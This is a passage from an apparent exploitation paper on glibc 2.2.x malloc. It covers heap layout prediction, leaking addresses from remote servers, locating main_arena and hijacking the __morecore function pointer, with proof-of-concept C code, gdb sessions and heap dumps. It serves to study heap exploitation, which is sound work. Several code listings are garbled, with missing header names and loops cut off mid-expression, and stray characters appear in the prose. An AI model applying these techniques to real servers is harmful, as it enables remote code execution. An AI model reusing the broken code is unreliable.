initial layout may not vary much across different versions of the targeted server, but in case of major changes in the source code. One issue very related to the heap layout analysis is the kind of process being exploited. In case of a process that serves several clients, heap layout evolution prediction is harder, as may be influenced by other clients that may be interacting with our target server while we are trying to exploit it. However, it gets useful in case where the interaction between the server and the client is very restricted, as it enables the attacker to open multiple connections to affect the same process with different input commands. On the other hand, exploiting a one client per process server (i.e. a forking server) is easier, as long as we can accurately predict the initial heap layout and we are able to populate the process memory in a fully controlled way. As it is obvious, a server that does not get restarted, gives us just one shot so, for example, bruteforcing and/or 'heap reset' can't be applied. 
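Before moving on to the information leak techniques, it is worth recalling
the write pattern that the aa4bmo primitive is built on.  The following is
the unlink() macro from glibc-2.2.x malloc.c, as used by chunk_free() in
the forward consolidation step shown earlier (the technique itself is
detailed in [2] and [3]); the comments mapping its effects to 'what' and
'where' follow the unlinkMe chunk layout above and are only a reminder
added here:

#define unlink(P, BK, FD)                                                  \
{                                                                          \
  BK = P->bk;      /* BK = where-8, the bk field we planted             */ \
  FD = P->fd;      /* FD = what, the fd field we planted                */ \
  FD->bk = BK;     /* *(what + 12) = where-8, the 'mirrored' side       */ \
  BK->fd = FD;     /* *((where-8) + 8) = *(where) = what, the write     */ \
}

Both stores must land in writable memory, which is why the values we can
use for 'what' are restricted to pointers into writable memory.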
--------------------------------------------------------------------------- --] 4.4 Obtaining information from the remote process The idea behind the techniques in this section is to force a remote server to give us information to aid us in finding the memory locations needed for exploitation. This concept was already used as different mechanisms in the 'Bypassing PaX ASLR' paper [13], used to bypass randomized space address processes. Also, the idea was suggested in [4], as 'transforming a write primitive in a read primitive'. --] 4.4.1 Modifying server static data - finding process' DATA This technique was originally seen in wuftpd ~{ exploits. When the ftpd process receives a 'help' request, answers with all the available commands. These are stored in a table which is part of the process' DATA, being a static structure. The attacker tries to overwrite part of the structure, and using the 'help' command until he sees a change in the server's answer. Now the attacker knows an absolute address within the process' DATA, being able to predict the location of the process' GOT. --] 4.4.2 Modifying user input - finding shellcode location The following technique allows the attacker to find the exact location of the injected shellcode within the process' address space, being independent of the target process. To obtain the address, the attacker provides the process with some bogus data, which is stored in some part of the process. Then, the basic primitive is used, trying to write 4 bytes in the location the bogus data was previously stored. After this, the server is forced to reply using the supplied bogus data. If the replayed data differs from the original supplied (taken into account any transformation the server may perform on our input), we can be sure that next time we send the same input sequence to the server, it will be stored in the same place. The server's answer may be truncated if a function expecting NULL terminating strings is used to craft it, or to obtain the answer's length before sending it through the network. In fact, the provided input may be stored multiple times in different locations, we will only detect a modification when we hit the location where the server reply is crafted. Note we are able to try two different addresses for each connection, speeding up the bruteforcing mechanism. The main requirement needed to use this trick, is being able to trigger the aa4bmo primitive between the time the supplied data is stored and the time the server's reply is built. Understanding the process allocation behavior, including how is processed each available input command is needed. --] 4.4.2.1 Proof of concept 3 : Hitting the output The following code simulates a process which provides us with a aa4bmo primitive to try to find where a heap allocated output buffer is located: #include #define SZ 256 #define SOMEOFFSET 5 + (rand() % (SZ-1)) #define PREV_INUSE 1 #define IS_MMAP 2 #define OUTPUTSZ 1024 void aa4bmoPrimitive(unsigned long what, unsigned long where){ unsigned long *unlinkMe=(unsigned long*)malloc(SZ*sizeof(unsigned long)); int i = 0; unlinkMe[i++] = -4; unlinkMe[i++] = -4; unlinkMe[i++] = what; unlinkMe[i++] = where-8; for(;i output ## OUTPUT hide and seek ## [.] trying 0x8049ccc (-) output was not @ 0x8049ccc :P [.] trying 0x80498b8 (-) output was not @ 0x80498b8 :P [.] trying 0x8049cd0 (-) output was not @ 0x8049cd0 :P [.] trying 0x8049cd4 (-) output was not @ 0x8049cd4 :P [.] trying 0x8049cd8 (-) output was not @ 0x8049cd8 :P [.] 
trying 0x8049cdc (-) output was not @ 0x8049cdc :P [.] trying 0x80498c8 (!) you found the output @ 0x80498c8 :( [OOOOOOOO~X^D^H~X^D^HOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO ... OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO] Note the stamped output in the following hexdump: ... 7920 756f 6620 756f 646e 7420 6568 6f20 7475 7570 2074 2040 7830 3038 3934 6338 2038 283a 5b0a 4f4f 4f4f 4f4f 4f4f 98c8 <== 0804 98c8 0804 4f4f 4f4f 4f4f 4f4f 4f4f <== 4f4f 4f4f 4f4f 4f4f 4f4f 4f4f 4f4f 4f4f 4f4f 4f4f 4f4f 0a5d This bruteforcing mechanism is not completely accurate in some cases, for example, when the target server uses an output buffering scheme. In order to improve the technique, we might mark some part of the supplied data as real shellcode, and other as nops, requiring the nop part to be hit while bruteforcing in order to avoid obtaining an address in the middle of our shellcode. Even better, we could tag each four bytes with a masked offset (i.e. to avoid character \x00 i.e.), when we analyse the reply we will now obtain the expected offset to the shellcode, so being able in a second try to see if actually in that expected address was stored our shellcode, detecting and avoiding this way the risk of our input being split and stored separated in the heap. For example, in the CVS 'Directory' double free exploit [7], unrecognized commands (i.e. 'cucucucucu') are used to populate the server heap. The server does not answer, just stores the provided data in the heap, and waits, until a noop or a command is received. After that, the unrecognized command that was sent is sent back without any modification to the client. We can provide the server with data almost without any size restriction, this data is stored in the heap, until we force it to be replayed to us. However, analysing how our unrecognized command is stored in the heap we find that, instead of what we expected (a single memory chunk with our data), there are other structures mixted with our input: --- HEAP DUMP --- ADDRESS SIZE FD BK [...] chunk 0x80e9998 0x00661 (F) | 0x40018e48 | 0x40018e48 | chunk 0x80e9ff8 0x10008 (A) chunk 0x80fa000 0x00ff9 (F) | 0x40018ed0 | 0x0810b000 | chunk 0x80faff8 0x10008 (A) chunk 0x810b000 0x00ff9 (F) | 0x080fa000 | 0x0811c000 | chunk 0x810bff8 0x10008 (A) chunk 0x813e000 0x04001 (T) sbrk_end 0x8142000 This happens because error messages are buffered when generated, waiting to be flushed, some buffering state internal structures get allocated, and our data is split and stored in fixed size error buffers. --] 4.4.3 Modifying user input - finding libc's DATA In this situation, we are able to provide some input to the vulnerable server which is then sent as output to us again. For example, in the CVS 'Directory' double free() vulnerability, we give the server and invalid command, which is finally echoed back to the client explaining it was an invalid command. If we are able to force a call to free(), to an address pointing in somewhere in the middle of our provided input, before it is sent back to the client, we will be able to get the address of a main_arena's bin. The ability to force a free() pointing to our supplied input, depends on the exploitation scenario, being simple to achieve this in 'double-free' situations. When the server frees our input, it founds a very big sized chunk, so it links it as the first chunk (lonely chunk) of the bin. 
This depends mainly on the process heap layout, but depending on what we are exploiting it should be easy to predict which size would be needed to create the new free chunk as a lonely one. When frontlink() setups the new free chunk, it saves the bin address in the fw and bk pointer of the chunk, being this what ables us to obtain later the bin address. Note we should be careful with our input chunk, in order to avoid the process crashing while freeing our chunk, but this is quite simple in most cases, i.e. providing a known address near the end of the stack. The user provides as input a 'cushion chunk' to the target process. free() is called in any part of our input, so our especially crafted chunk is inserted in one of the last bins (we may know it's empty from the heap analysis stage, avoiding then a process crash). When the provided cushion chunk is inserted into the bin, the bin's address is written in the fd and bk fields of the chunk's header. --] 4.4.3.1 Proof of concept 4 : Freeing the output The following code creates a 'cushion chunk' as it would be sent to the server, and calls free() at a random location within the chunk (as the target server would do). The cushion chunk writes to a valid address to avoid crashing the process, and its backward and forward pointer are set with the bin's address by the frontlink() macro. Then, the code looks for the wanted addresses within the output, as would do an exploit which received the server answer. #include #define SZ 256 #define SOMEOFFSET 5 + (rand() % (SZ-1)) #define PREV_INUSE 1 #define IS_MMAP 2 unsigned long *aa4bmoPrimitive(unsigned long what, unsigned long where){ unsigned long *unlinkMe=(unsigned long*)malloc(SZ*sizeof(unsigned long)); int i = 0; unlinkMe[i++] = -4; unlinkMe[i++] = -4; unlinkMe[i++] = what; unlinkMe[i++] = where-8; for(;i %p\n",output[i]); return 0; } printf("(x) did not find bin address\n"); } ./freeOutput ## FREEING THE OUTPUT PoC ## (-) creating output buffer... (-) calling free() at random address of output buffer... (-) looking for bin address... (!) 
found bin address -> 0x4212b1dc We get chunk free with our provided buffer: chunk_free (ar_ptr=0x40018040, p=0x8049ab0) at heapy.c:3221 (gdb) x/20x p 0x8049ab0: 0xfffffd6d 0xfffffd69 0xfffffd65 0xfffffd61 0x8049ac0: 0xfffffd5d 0xfffffd59 0xfffffd55 0xfffffd51 0x8049ad0: 0xfffffd4d 0xfffffd49 0xfffffd45 0xfffffd41 0x8049ae0: 0xfffffd3d 0xfffffd39 0xfffffd35 0xfffffd31 0x8049af0: 0xfffffd2d 0xfffffd29 0xfffffd25 0xfffffd21 (gdb) 0x8049b00: 0xfffffd1d 0xfffffd19 0xfffffd15 0xfffffd11 0x8049b10: 0xfffffd0d 0xfffffd09 0xfffffd05 0xfffffd01 0x8049b20: 0xfffffcfd 0xfffffcf9 0xfffffcf5 0xfffffcf1 0x8049b30: 0xfffffced 0xfffffce9 0xfffffce5 0xfffffce1 0x8049b40: 0xfffffcdd 0xfffffcd9 0xfffffcd5 0xfffffcd1 (gdb) 0x8049b50: 0xfffffccd 0xfffffcc9 0xfffffcc5 0xfffffcc1 0x8049b60: 0xfffffcbd 0xfffffcb9 0xfffffcb5 0xfffffcb1 0x8049b70: 0xfffffcad 0xfffffca9 0xfffffca5 0xfffffca1 0x8049b80: 0xfffffc9d 0xfffffc99 0xfffffc95 0xfffffc91 0x8049b90: 0xfffffc8d 0xfffffc89 0xfffffc85 0xfffffc81 (gdb) 3236 next = chunk_at_offset(p, sz); 3237 nextsz = chunksize(next); 3239 if (next == top(ar_ptr)) /* merge with top */ 3278 islr = 0; 3280 if (!(hd & PREV_INUSE)) /* consolidate backward */ 3294 if (!(inuse_bit_at_offset(next, nextsz))) /* consolidate forward */ 3296 sz += nextsz; 3298 if (!islr && next->fd == last_remainder(ar_ptr)) 3306 unlink(next, bck, fwd); 3315 set_head(p, sz | PREV_INUSE); 3316 next->prev_size = sz; 3317 if (!islr) { 3318 frontlink(ar_ptr, p, sz, idx, bck, fwd); After the frontlink() macro is called with our supplied buffer, it gets the address of the bin in which it is inserted: fronlink(0x8049ab0,-668,126,0x40018430,0x40018430) new free chunk (gdb) x/20x p 0x8049ab0: 0xfffffd6d 0xfffffd65 0x40018430 0x40018430 0x8049ac0: 0xfffffd5d 0xfffffd59 0xfffffd55 0xfffffd51 0x8049ad0: 0xfffffd4d 0xfffffd49 0xfffffd45 0xfffffd41 0x8049ae0: 0xfffffd3d 0xfffffd39 0xfffffd35 0xfffffd31 0x8049af0: 0xfffffd2d 0xfffffd29 0xfffffd25 0xfffffd21 (gdb) c Continuing. (-) looking for bin address... (!) found bin address -> 0x40018430 Let's check the address we obtained: (gdb) x/20x 0x40018430 0x40018430 : 0x40018428 0x40018428 0x08049ab0 0x08049ab0 0x40018440 : 0x40018438 0x40018438 0x40018040 0x000007f0 0x40018450 : 0x00000001 0x00000000 0x00000001 0x0000016a 0x40018460 <__FRAME_END__+12>: 0x0000000c 0x00001238 0x0000000d 0x0000423c 0x40018470 <__FRAME_END__+28>: 0x00000004 0x00000094 0x00000005 0x4001370c And we see it's one of the last bins of the main_arena. Although in this example we hit the cushion chunk in the first try on purpose, this technique can be applied to brute force the location of our output buffer also at the same time (if we don't know it beforehand). --] 4.4.4 Vulnerability based heap memory leak - finding libc's data In this case, the vulnerability itself leads to leaking process memory. For example, in the OpenSSL 'SSLv2 Malformed Client Key Buffer Overflow' vulnerability [6], the attacker is able to overflow a buffer and overwrite a variable used to track a buffer length. When this length is overwritten with a length greater than the original, the process sends the content of the buffer (stored in the process' heap) to the client, sending more information than the originally stored. The attacker obtains then a limited portion of the process heap. 
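Before abusing the leaked information, the offset-tagging idea suggested
in 4.4.2 can be made concrete: fill our buffers with data that encodes its
own position, so that any piece of it coming back in a leak or an echoed
reply tells us where the rest of our data sits.  The sketch below is an
illustrative implementation of that suggestion and is not taken from any
of the referenced exploits; the encoding (7 bits per byte, top bit always
set so no byte is \x00) and the helper names are assumptions of this
example.  32-bit longs are assumed, as throughout this paper.

#include <stdio.h>

/* Every aligned 4-byte word of the buffer encodes its own word index.
   Decoding any aligned word that shows up in a leak or echoed reply
   gives the offset of our injected data it was taken from. */
static unsigned long tag_encode(unsigned long idx)
{
	return 0x80808080UL
	     | ( idx        & 0x7f)
	     | ((idx >>  7) & 0x7f) <<  8
	     | ((idx >> 14) & 0x7f) << 16
	     | ((idx >> 21) & 0x7f) << 24;
}

/* returns the byte offset encoded in a leaked/echoed aligned word */
static unsigned long tag_decode(unsigned long word)
{
	unsigned long idx = ( word        & 0x7f)
	                  | ((word >>  8) & 0x7f) <<  7
	                  | ((word >> 16) & 0x7f) << 14
	                  | ((word >> 24) & 0x7f) << 21;
	return idx * 4;
}

static void tag_fill(unsigned char *buf, unsigned long len)
{
	unsigned long off;

	for (off = 0; off + 4 <= len; off += 4)
		*(unsigned long *)(buf + off) = tag_encode(off / 4);
}

int main(void)
{
	unsigned char buf[4096];

	tag_fill(buf, sizeof(buf));
	/* pretend the word at offset 0x618 came back in a server reply */
	printf("leaked word decodes to offset 0x%lx\n",
	       tag_decode(*(unsigned long *)(buf + 0x618)));
	return 0;
}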
---------------------------------------------------------------------------

--] 4.5 Abusing the leaked information

The goal of the techniques in this section is to exploit the information
gathered using one of the process information leak tricks shown before.

--] 4.5.1 Recognizing the arena

The idea is to obtain, from the previously gathered information, the
address of one of malloc's bins.  This applies mainly to scenarios where
we are able to leak process heap memory.  A bin address can be directly
obtained if the attacker is able to use the 'freeing the output'
technique.  The obtained bin address can be used later to find the address
of a function pointer to overwrite with the address of our shellcode, as
shown in the next techniques.

Remembering how the bins are organized in memory (circular doubly linked
lists), we know that a chunk hanging from a bin containing just one chunk
will have both pointers (bk and fd) pointing to the head of the list, to
the same address, since the list is circular.

                    (first chunk)                  (last chunk)
  [bin_n]
    [fd ptr] ----> [<- chunk ->]  [<- chunk ->]  [<-
    [bk ptr] ----> [<- chunk ->]  [<- chunk ->]  [<-
  [bin_n+1]
      .
      .
      .
  [bin_X]
    [fd ptr] ----> [<-
                        lonely but interesting chunk
    [bk ptr] ----> [<-
      .
      .

This is really nice, as it allows us to recognize within the heap an
address pointing to a bin; more exactly, to some place in the main_arena,
which is located in libc's address space, as the heads of the bin lists
are kept in the main_arena.  Then, we can look for two equal memory
addresses, one next to the other, pointing to libc's memory (looking for
addresses of the form 0x4....... is enough for our purpose).  We can
suppose these pairs of addresses are part of a free chunk which is the
only one hanging from a bin; we know it looks like:

    | size | fd | bk |

How easy is it to find a lonely chunk in the heap immensity?  First, this
depends on the exploitation scenario and the exploited process heap
layout.  For example, when exploiting the OpenSSL bug across different
targets, we could always find at least one lonely chunk within the leaked
heap memory.  Second, there is another scenario in which we will be able
to locate a malloc bin, even without the capability of finding a lonely
chunk.  If we are able to find the first or last chunk of a bin, one of
its pointers will reference an address within the main_arena, while the
other one will point to another free chunk in the process heap.  So, we'll
be looking for pairs of valid pointers like these:

    [ ptr_2_libc's_memory | ptr_2_process'_heap ]

or

    [ ptr_2_process'_heap | ptr_2_libc's_memory ]

We must take into account that this heuristic will not be as accurate as
searching for a pair of equal pointers into libc's address space, but as
we already said, it's possible to cross-check between multiple possible
chunks.  Finally, we must remember this depends totally on the way we are
abusing the process to read its memory.  In case we can read arbitrary
addresses of memory, this is not an issue; the problem gets harder the
more limited our mechanism to retrieve remote memory is.

--] 4.5.2 Morecore

Here, we show how to find a function pointer within the libc after
obtaining a malloc bin address, using one of the mechanisms explained
before.  Using the size field of the retrieved chunk header and the
bin_index() or smallbin_index() macro, we obtain the exact address of the
main_arena.
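A minimal sketch of how an exploit might put these two observations
together: scan a leaked heap snapshot for a lonely chunk (two equal,
adjacent pointers into libc) and derive &main_arena[0] from it.  The bin
index macros are the glibc-2.2.x ones reproduced in the proof of concept
below; the snapshot-scanning form and the 0x4....... check are
illustrative assumptions of this sketch:

/* glibc-2.2.x bin index macros, as in the proof of concept below */
#define MAX_SMALLBIN_SIZE 512
#define SMALLBIN_WIDTH 8
#define is_small_request(nb) ((nb) < MAX_SMALLBIN_SIZE - SMALLBIN_WIDTH)
#define smallbin_index(sz) (((unsigned long)(sz)) >> 3)
#define bin_index(sz) \
(((((unsigned long)(sz)) >> 9) ==    0) ?       (((unsigned long)(sz)) >>  3):\
 ((((unsigned long)(sz)) >> 9) <=    4) ?  56 + (((unsigned long)(sz)) >>  6):\
 ((((unsigned long)(sz)) >> 9) <=   20) ?  91 + (((unsigned long)(sz)) >>  9):\
 ((((unsigned long)(sz)) >> 9) <=   84) ? 110 + (((unsigned long)(sz)) >> 12):\
 ((((unsigned long)(sz)) >> 9) <=  340) ? 119 + (((unsigned long)(sz)) >> 15):\
 ((((unsigned long)(sz)) >> 9) <= 1364) ? 124 + (((unsigned long)(sz)) >> 18):\
                                          126)
#define SIZE_MASK 0x3

/* Scan a leaked heap snapshot (nwords 4-byte words) for a lonely chunk:
   fd == bk == bin address, preceded by the chunk's size field.  From the
   bin address and the bin index derived from the size, compute
   &main_arena[0]; __morecore sits 32 bytes before it, as explained
   below. */
int find_morecore(unsigned long *leak, unsigned long nwords,
                  unsigned long *arena, unsigned long *morecore)
{
	unsigned long i, sz, bin;

	for (i = 1; i + 1 < nwords; i++) {
		if (leak[i] != leak[i + 1])             /* fd == bk ?        */
			continue;
		if ((leak[i] & 0xf0000000UL) != 0x40000000UL)
			continue;                       /* points into libc? */
		sz  = leak[i - 1] & ~SIZE_MASK;         /* size field        */
		bin = is_small_request(sz) ? smallbin_index(sz) : bin_index(sz);
		*arena    = leak[i] - bin * 2 * sizeof(void *);
		*morecore = *arena - 32;
		return 1;
	}
	return 0;                                       /* nothing found     */
}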
We can cross check between multiple supposed lonely chunks that the main_arena address we obtained is the real one, depending on the quantity of lonely chunks pairs we'll be more sure. As long as the process doesn't crash, we may retrieve heap memory several times, as main_arena won't change its location. Moreover, I think it wouldn't be wrong to assume main_arena is located in the same address across different processes (this depends on the address on which the libc is mapped). This may even be true across different servers processes, allowing us to retrieve the main_arena through a leak in a process different from the one being actively exploited. Just 32 bytes before &main_arena[0] is located __morecore. Void_t *(*__morecore)() = __default_morecore; MORECORE() is the name of the function that is called through malloc code in order to obtain more memory from the operating system, it defaults to sbrk(). Void_t * __default_morecore (); Void_t *(*__morecore)() = __default_morecore; #define MORECORE (*__morecore) The following disassembly shows how MORECORE is called from chunk_alloc() code, an indirect call to __default_morecore is performed by default: : mov 0x64c(%ebx),%eax : sub $0xc,%esp : push %esi : call *(%eax) where $eax points to __default_morecore (gdb) x/x $eax 0x4212df80 <__morecore>: 0x4207e034 (gdb) x/4i 0x4207e034 0x4207e034 <__default_morecore>: push %ebp 0x4207e035 <__default_morecore+1>: mov %esp,%ebp 0x4207e037 <__default_morecore+3>: push %ebx 0x4207e038 <__default_morecore+4>: sub $0x10,%esp MORECORE() is called from the malloc() algorithm to extend the memory top, requesting the operating system via the sbrk. MORECORE() gets called twice from malloc_extend_top() brk = (char*)(MORECORE (sbrk_size)); ... /* Allocate correction */ new_brk = (char*)(MORECORE (correction)); which is called by chunk_alloc(): /* Try to extend */ malloc_extend_top(ar_ptr, nb); Also, MORECORE is called by main_trim() and top_chunk(). We just need to sit and wait until the code reaches any of these points. In some cases it may be necessary to arrange things in order to avoid the code crashing before. The morecore function pointer is called each time the heap needs to be extended, so forcing the process to allocate a lot of memory is recommended after overwriting the pointer. In case we are not able to avoid a crash before taking control of the process, there's no problem (unless the server dies completely), as we can expect the libc to be mapped in the same address in most cases. --] 4.5.2.1 Proof of concept 5 : Jumping with morecore The following code just shows to get the required information from a freed chunk, calculates the address of __morecore and forces a call to MORECORE() after having overwritten it. [jp@vaiolator heapy]$ ./heapy (-) lonely chunk was freed, gathering information... (!) sz = 520 - bk = 0x4212E1A0 - fd = 0x4212E1A0 (!) the chunk is in bin number 64 (!) &main_arena[0] @ 0x4212DFA0 (!) __morecore @ 0x4212DF80 (-) overwriting __morecore... (-) forcing a call to MORECORE()... Segmentation fault Let's look what happened with gdb, we'll also be using a simple modified malloc in the form of a shared library to know what is going on inside malloc's internal structures. [jp@vaiolator heapy]$ gdb heapy GNU gdb Red Hat Linux (5.2-2) Copyright 2002 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. 
There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-redhat-linux"... (gdb) r Starting program: /home/jp/cerebro//heapy/morecore (-) lonely chunk was freed, gathering information... (!) sz = 520 - bk = 0x4212E1A0 - fd = 0x4212E1A0 (!) the chunk is in bin number 64 (!) &main_arena[0] @ 0x4212DFA0 (!) __morecore @ 0x4212DF80 (-) overwriting __morecore... (-) forcing a call to MORECORE()... Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? () Taking a look at the output step by step: First we alloc our lonely chunk: chunk = (unsigned int*)malloc(CHUNK_SIZE); (gdb) x/8x chunk-1 0x80499d4: 0x00000209 0x00000000 0x00000000 0x00000000 0x80499e4: 0x00000000 0x00000000 0x00000000 0x00000000 Note we call malloc() again with another pointer, letting this aux pointer be the chunk next to the top_chunk... to avoid the differences in the way it is handled when freed with our purposes (remember in this special case the chunk would be coalesced with the top_chunk without getting linked to any bin): aux = (unsigned int*)malloc(0x0); [1422] MALLOC(512) - CHUNK_ALLOC(0x40019bc0,520) - returning 0x8049a18 from top_chunk - new top 0x8049c20 size 993 [1422] MALLOC(0) - CHUNK_ALLOC(0x40019bc0,16) - returning 0x8049c20 from top_chunk - new top 0x8049c30 size 977 This is the way the heap looks like up to now... --- HEAP DUMP --- ADDRESS SIZE FLAGS sbrk_base 0x80499f8 chunk 0x80499f8 33(0x21) (inuse) chunk 0x8049a18 521(0x209) (inuse) chunk 0x8049c20 17(0x11) (inuse) chunk 0x8049c30 977(0x3d1) (top) sbrk_end 0x804a000 --- HEAP LAYOUT --- |A||A||A||T| --- BIN DUMP --- ar_ptr = 0x40019bc0 - top(ar_ptr) = 0x8049c30 No bins at all exist now, they are completely empty. After that we free him: free(chunk); [1422] FREE(0x8049a20) - CHUNK_FREE(0x40019bc0,0x8049a18) - fronlink(0x8049a18,520,64,0x40019dc0,0x40019dc0) - new free chunk (gdb) x/8x chunk-1 0x80499d4: 0x00000209 0x4212e1a0 0x4212e1a0 0x00000000 0x80499e4: 0x00000000 0x00000000 0x00000000 0x00000000 The chunk was freed and inserted into some bin... which was empty as this was the first chunk freed. So this is a 'lonely chunk', the only chunk in one bin. Here we can see both bk and fd pointing to the same address in libc's memory, let's see how the main_arena looks like now: 0x4212dfa0 : 0x00000000 0x00010000 0x08049be8 0x4212dfa0 0x4212dfb0 : 0x4212dfa8 0x4212dfa8 0x4212dfb0 0x4212dfb0 0x4212dfc0 : 0x4212dfb8 0x4212dfb8 0x4212dfc0 0x4212dfc0 0x4212dfd0 : 0x4212dfc8 0x4212dfc8 0x4212dfd0 0x4212dfd0 0x4212dfe0 : 0x4212dfd8 0x4212dfd8 0x4212dfe0 0x4212dfe0 0x4212dff0 : 0x4212dfe8 0x4212dfe8 0x4212dff0 0x4212dff0 0x4212e000 : 0x4212dff8 0x4212dff8 0x4212e000 0x4212e000 0x4212e010 : 0x4212e008 0x4212e008 0x4212e010 0x4212e010 0x4212e020 : 0x4212e018 0x4212e018 0x4212e020 0x4212e020 0x4212e030 : 0x4212e028 0x4212e028 0x4212e030 0x4212e030 ... ... 0x4212e180 : 0x4212e178 0x4212e178 0x4212e180 0x4212e180 0x4212e190 : 0x4212e188 0x4212e188 0x4212e190 0x4212e190 0x4212e1a0 : 0x4212e198 0x4212e198 0x080499d0 0x080499d0 0x4212e1b0 : 0x4212e1a8 0x4212e1a8 0x4212e1b0 0x4212e1b0 0x4212e1c0 : 0x4212e1b8 0x4212e1b8 0x4212e1c0 0x4212e1c0 Note the completely just initialized main_arena with all its bins pointing to themselves, and the just added free chunk to one of the bins... (gdb) x/4x 0x4212e1a0 0x4212e1a0 : 0x4212e198 0x4212e198 0x080499d0 0x080499d0 Also, both bin pointers refer to our lonely chunk. 
Let's take a look at the heap in this moment: --- HEAP DUMP --- ADDRESS SIZE FLAGS sbrk_base 0x80499f8 chunk 0x80499f8 33(0x21) (inuse) chunk 0x8049a18 521(0x209) (free) fd = 0x40019dc0 | bk = 0x40019dc0 chunk 0x8049c20 16(0x10) (inuse) chunk 0x8049c30 977(0x3d1) (top) sbrk end 0x804a000 --- HEAP LAYOUT --- |A||64||A||T| --- BIN DUMP --- ar_ptr = 0x40019bc0 - top(ar_ptr) = 0x8049c30 bin -> 64 (0x40019dc0) free_chunk 0x8049a18 - size 520 Using the known size of the chunk, we know in which bin it was placed, so we can get main_arena's address and, finally, __morecore. (gdb) x/16x 0x4212dfa0-0x20 0x4212df80 <__morecore>: 0x4207e034 0x00000000 0x00000000 0x00000000 0x4212df90 <__morecore+16>: 0x00000000 0x00000000 0x00000000 0x00000000 0x4212dfa0 : 0x00000000 0x00010000 0x08049be8 0x4212dfa0 0x4212dfb0 : 0x4212dfa8 0x4212dfa8 0x4212dfb0 0x4212dfb0 Here, by default __morecore points to __default_morecore: (gdb) x/20i __morecore 0x4207e034 <__default_morecore>: push %ebp 0x4207e035 <__default_morecore+1>: mov %esp,%ebp 0x4207e037 <__default_morecore+3>: push %ebx 0x4207e038 <__default_morecore+4>: sub $0x10,%esp 0x4207e03b <__default_morecore+7>: call 0x4207e030 0x4207e040 <__default_morecore+12>: add $0xb22cc,%ebx 0x4207e046 <__default_morecore+18>: mov 0x8(%ebp),%eax 0x4207e049 <__default_morecore+21>: push %eax 0x4207e04a <__default_morecore+22>: call 0x4201722c <_r_debug+33569648> 0x4207e04f <__default_morecore+27>: mov 0xfffffffc(%ebp),%ebx 0x4207e052 <__default_morecore+30>: mov %eax,%edx 0x4207e054 <__default_morecore+32>: add $0x10,%esp 0x4207e057 <__default_morecore+35>: xor %eax,%eax 0x4207e059 <__default_morecore+37>: cmp $0xffffffff,%edx 0x4207e05c <__default_morecore+40>: cmovne %edx,%eax 0x4207e05f <__default_morecore+43>: mov %ebp,%esp 0x4207e061 <__default_morecore+45>: pop %ebp 0x4207e062 <__default_morecore+46>: ret 0x4207e063 <__default_morecore+47>: lea 0x0(%esi),%esi 0x4207e069 <__default_morecore+53>: lea 0x0(%edi,1),%edi To conclude, we overwrite __morecore with a bogus address, and force malloc to call __morecore: *(unsigned int*)morecore = 0x41414141; chunk=(unsigned int*)malloc(CHUNK_SIZE*4); [1422] MALLOC(2048) - CHUNK_ALLOC(0x40019bc0,2056) - extending top chunk - previous size 976 Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? () (gdb) bt #0 0x41414141 in ?? () #1 0x4207a148 in malloc () from /lib/i686/libc.so.6 #2 0x0804869d in main (argc=1, argv=0xbffffad4) at heapy.c:52 #3 0x42017589 in __libc_start_main () from /lib/i686/libc.so.6 (gdb) frame 1 #1 0x4207a148 in malloc () from /lib/i686/libc.so.6 (gdb) x/i $pc-0x5 0x4207a143 : call 0x4207a2f0 (gdb) disass chunk_alloc Dump of assembler code for function chunk_alloc: ... 0x4207a8ac : mov 0x64c(%ebx),%eax 0x4207a8b2 : sub $0xc,%esp 0x4207a8b5 : push %esi 0x4207a8b6 : call *(%eax) At this point we see chunk_alloc trying to jump to __morecore (gdb) x/x $eax 0x4212df80 <__morecore>: 0x41414141 #include #include /* some malloc code... */ #define MAX_SMALLBIN 63 #define MAX_SMALLBIN_SIZE 512 #define SMALLBIN_WIDTH 8 #define is_small_request(nb) ((nb) < MAX_SMALLBIN_SIZE - SMALLBIN_WIDTH) #define smallbin_index(sz) (((unsigned long)(sz)) >> 3) #define bin_index(sz) \ (((((unsigned long)(sz)) >> 9) == 0) ? (((unsigned long)(sz)) >> 3):\ ((((unsigned long)(sz)) >> 9) <= 4) ? 56 + (((unsigned long)(sz)) >> 6):\ ((((unsigned long)(sz)) >> 9) <= 20) ? 91 + (((unsigned long)(sz)) >> 9):\ ((((unsigned long)(sz)) >> 9) <= 84) ? 110 + (((unsigned long)(sz)) >> 12):\ ((((unsigned long)(sz)) >> 9) <= 340) ? 
#define SIZE_MASK  0x3
#define CHUNK_SIZE 0x200

int main(int argc, char *argv[]){
  unsigned int *chunk,*aux,sz,bk,fd,bin,arena,morecore;

  chunk = (unsigned int*)malloc(CHUNK_SIZE);
  aux   = (unsigned int*)malloc(0x0);
  free(chunk);
  printf("(-) lonely chunk was freed, gathering information...\n");

  sz = chunk[-1] & ~SIZE_MASK;
  fd = chunk[0];
  bk = chunk[1];

  if(bk==fd)
    printf("\t(!) sz = %u - bk = 0x%X - fd = 0x%X\n",sz,bk,fd);
  else
    printf("\t(X) bk != fd ...\n"),exit(-1);

  bin = is_small_request(sz)? smallbin_index(sz) : bin_index(sz);
  printf("\t(!) the chunk is in bin number %d\n",bin);

  arena = bk-bin*2*sizeof(void*);
  printf("\t(!) &main_arena[0] @ 0x%X\n",arena);

  morecore = arena-32;
  printf("\t(!) __morecore @ 0x%X\n",morecore);

  printf("(-) overwriting __morecore...\n");
  *(unsigned int*)morecore = 0x41414141;

  printf("(-) forcing a call to MORECORE()...\n");
  chunk = (unsigned int*)malloc(CHUNK_SIZE*4);

  return 7;
}

This technique works even when the process is loaded in a randomized
address space, as the address of the function pointer is gathered at
runtime from the targeted process. The mechanism is fully generic, since
every process linked against glibc can be exploited this way. Also, no
bruteforcing is needed: a single try is enough to exploit the process.

On the other hand, this technique is no longer useful against newer libcs
(i.e. 2.2.93), due to the changes malloc's code has suffered. A new
approach is suggested later to help in the exploitation of these libc
versions.

The morecore idea was successfully tested on different glibc versions and
default installs of several Linux distributions: Debian 2.2r0, Mandrake
8.1, Mandrake 8.2, Redhat 6.1, Redhat 6.2, Redhat 7.0, Redhat 7.2, Redhat
